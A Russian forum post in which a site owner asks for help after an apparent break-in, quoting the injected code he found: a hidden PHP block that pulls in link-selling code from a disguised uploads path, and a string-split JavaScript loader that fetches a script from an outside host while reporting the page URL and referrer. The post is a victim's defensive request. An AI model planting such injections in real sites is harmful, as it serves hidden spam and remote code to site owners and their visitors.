Интересный взлом сайта

Вечер добрый уважаемые форумчане, у моего знакомого есть сайт. Сегодня вечером был видимо взлом, точнее шел залил, хотелось бы разобраться.

И так, сначала сайт грузился очень долго, особенно футер, потом касперский начал ругаться на

Троян программа Exloit.JS.Pdfka.bxa и соотвественно ссылка вела на сайт какой то не буду палить в рамках безопасности, дальше этот гад залил видимо через шел сапу и поставил кликандер

<div style=display:none><?php 

    global $sape;

    if (!defined('_SAPE_USER')){

        define('_SAPE_USER', 'ХЕШ_ПОЛЬЗОВАТЕЛЯ'); 

    }

    require_once($_SERVER['DOCUMENT_ROOT'].'/uploads/avatars/avatars_gallery/animation/images/img.php'); 

    $sape = new SAPE_client(); 

    echo $sape->return_links();

?></div>

Шел называется Web Shell by oRb http://forum.xakep.ru/m_1393504/mpage_1/key_/tm.htm#1393504

<script language="JavaScript">

    var lankru_html = '';

    lankru_html += '<scr' + 'ipt language="JavaSc' + 'ript" ';

    lankru_html += 'src="http://knalru' + '.ru/js.php?id=15157';

    lankru_html += '&dd=3&url=' + encodeURIComponent(document.location);

    lankru_html += '&ref=' + encodeURIComponent(document.referrer);

    lankru_html += '&rnd=' + Math.random() + '"></scr' + 'ipt>';

    document.write(lankru_html);

</script>

Вот что странно, как он по id грузит скрипт?

Стиот нод32 + аутпост на компе, думаем угнали пароли от ftp, возможно ли такое?

Что посоветуете товарищи? Что вообще делает это всё, насколько серьёзно и можно ли защититься? Подумал подумал, и решил что лучше сидеть под простым пользователем винды и линукса да? Насколько это безопасно?

+ По теме есть ещё 2 файла под зендом, может кто расшифрует, а то не бум ваще в этом, не пинайте сильно просто хочется всё детально узнать, по счёт сапы обратимся в тех поддержку.